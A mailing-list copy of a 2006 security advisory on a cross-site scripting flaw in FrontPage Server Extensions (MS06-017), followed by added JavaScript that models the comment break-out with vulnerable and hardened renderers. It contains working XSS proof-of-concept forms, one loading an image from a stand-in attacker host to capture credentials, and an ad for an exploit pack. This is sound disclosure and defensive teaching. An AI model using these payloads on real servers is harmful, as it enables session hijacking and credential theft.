Thread-topic: Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting
Technical details of the vulnerability
> -----Original Message-----
> From: Windows NTBugtraq Mailing List
> [mailto:NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx] On Behalf Of
> Esteban Martinez Fayo
> Sent: Thursday, April 13, 2006 1:30 AM
> To: NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx
> Subject: Vulnerability in Microsoft FrontPage Server
> Extensions Could Allow Cross-Site Scripting
>
> Argeniss Security Advisory
>
>
> Name: Vulnerability in Microsoft FrontPage Server Extensions Could Allow
> Cross-Site Scripting (MS06-017)
> Affected Software: Microsoft FrontPage Server Extensions 2002 and
> Microsoft SharePoint Team Services
> Severity: Medium
> Remote exploitable: Yes (User intervention required)
> Credits: Esteban Martínez Fayó
> Date: 4/11/2006
> Advisory Number: ARG040602
>
>
> Details:
> The FrontPage Server Extensions 2002 (included in Windows Server 2003
> IIS 6.0 and available as a separate download for Windows 2000 and XP)
> has a web page /_vti_bin/_vti_adm/fpadmdll.dll that is used for
> administrative purposes. This web page is vulnerable to cross-site
> scripting attacks, allowing an attacker to run client-side script on
> behalf of an FPSE user. If the victim is an administrator, the attacker
> could take complete control of a FrontPage Server Extensions 2002 server.
>
> To exploit the vulnerability, an attacker can send a specially crafted
> e-mail message to an FPSE user and then persuade the user to click a
> link in the e-mail message. In addition, this vulnerability can be
> exploited if an attacker hosts a malicious website and persuades the
> user to visit it.
>
> The vulnerable parameters of fpadmdll.dll are "operation", "command",
> and "name". These parameters appear in the output, without proper
> sanitization, inside an HTML comment, but the comment can be escaped
> with a '-->'.
>
> Exploit Examples:
>
> An attacker could create a FORM that POSTs to the FPSE server and
> executes a script on the client system.
> <form action="http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll" method="POST">
> <input type="hidden" name="operation" value="--><script>alert()</script>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
>
> Also, an attacker could inject an image from another web site that he
> controls and, if it requires HTTP authentication, could convince the
> user to enter their credentials and capture them.
> <form action="http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll" method="POST">
> <input type="hidden" name="operation" value="--><img src=http://hackersite/image.jpg>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
>
>
> Vendor Status:
> Vendor was contacted and a patch was released.
>
>
> Patch Available:
> Apply patch MS06-017.
>
>
> Links:
> http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
> http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx
>
>
> Spam:
> Argeniss Ultimate 0day Exploits Pack
> http://www.argeniss.com/products.html
>
>
>
> Argeniss - Information Security
> *Application Security Experts*
> http://www.argeniss.com
>
>
> --
> NTBugtraq Editor's Note:
>
> Most viruses these days use spoofed email addresses. As such,
> using an Anti-Virus product which automatically notifies the
> perceived sender of a message it believes is infected may
> well cause more harm than good. Someone who did not actually
> send you a virus may receive the notification and scramble
> their support staff to find an infection which never existed
> in the first place. Suggest such notifications be disabled by
> whomever is responsible for your AV, or at least that the
> idea is considered.
> --
>
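The reflection pattern the advisory describes, modelled as an added example that is not code from the advisory, from Argeniss or from Microsoft: the "operation", "command" and "name" parameters are echoed inside an HTML comment, and a value containing "-->" closes that comment so the rest of the value becomes live markup. The real fpadmdll.dll response markup is not given in the advisory, so the comment template, the parseForm/renderVulnerable/renderHardened/activeMarkup/reflectsScript function names and the POC_BODY request body are all constructed here. The hardened renderer shows the fix a practitioner would want: HTML-encode the value and encode hyphens too, so neither "-->" nor "--!>" can be assembled from attacker-controlled data.

```javascript
// Added example (not from the advisory): models reflection of request
// parameters into an HTML comment and shows why "-->" breaks out of it.
// The comment template is a constructed stand-in for fpadmdll.dll output.

// Parse the application/x-www-form-urlencoded body that the advisory's
// <form method="POST"> would send. Only the three reflected parameters
// named in the advisory are kept.
function parseForm(body) {
  const q = new URLSearchParams(body);
  return {
    operation: q.get('operation') || '',
    command: q.get('command') || '',
    name: q.get('name') || '',
  };
}

// Vulnerable rendering: the parameters are echoed, unencoded, inside an
// HTML comment. A value containing "-->" closes the comment early and
// everything after it is parsed by the browser as real markup.
function renderVulnerable(p) {
  return '<html><body>\n' +
    '<!-- operation=' + p.operation + ' command=' + p.command +
    ' name=' + p.name + ' -->\n' +
    '<h1>Server Extensions Administration</h1>\n' +
    '</body></html>\n';
}

// Hardened rendering: HTML-encode the value and additionally encode every
// hyphen, so the data can never contain a literal ">" or "--" and the
// comment cannot be closed from inside.
function commentSafe(v) {
  return String(v)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/-/g, '&#45;');
}

function renderHardened(p) {
  return '<html><body>\n' +
    '<!-- operation=' + commentSafe(p.operation) +
    ' command=' + commentSafe(p.command) +
    ' name=' + commentSafe(p.name) + ' -->\n' +
    '<h1>Server Extensions Administration</h1>\n' +
    '</body></html>\n';
}

// Strip well-formed comments; what remains is the markup a browser will
// actually build a DOM from (and execute scripts in).
function activeMarkup(html) {
  return html.replace(/<!--[\s\S]*?-->/g, '');
}

// Does a given request body land a <script> element in the page's
// active markup when rendered by `render`?
function reflectsScript(render, body) {
  return /<script\b/i.test(activeMarkup(render(parseForm(body))));
}

// Constructed request body equivalent to the advisory's first PoC form.
const POC_BODY = 'operation=' + encodeURIComponent('--><script>alert()</script>') +
  '&action=none&port=' + encodeURIComponent('/LM/W3SVC/1:') + '&page=healthrp.htm';

console.log('vulnerable page reflects script:', reflectsScript(renderVulnerable, POC_BODY));
console.log('hardened page reflects script:  ', reflectsScript(renderHardened, POC_BODY));
console.log('active markup of vulnerable page:\n' + activeMarkup(renderVulnerable(parseForm(POC_BODY))));
```

Run it with node; the vulnerable renderer reports true and prints `<script>alert()</script>` outside the comment, the hardened one reports false. Note that encoding `<` and `>` alone is enough to stop the break-out (both `-->` and `--!>` need a literal `>`), but encoding the hyphens as well keeps the comment well-formed even if a later change drops the `>` encoding, which is the defence-in-depth a reviewer should ask for when data is written into comments at all.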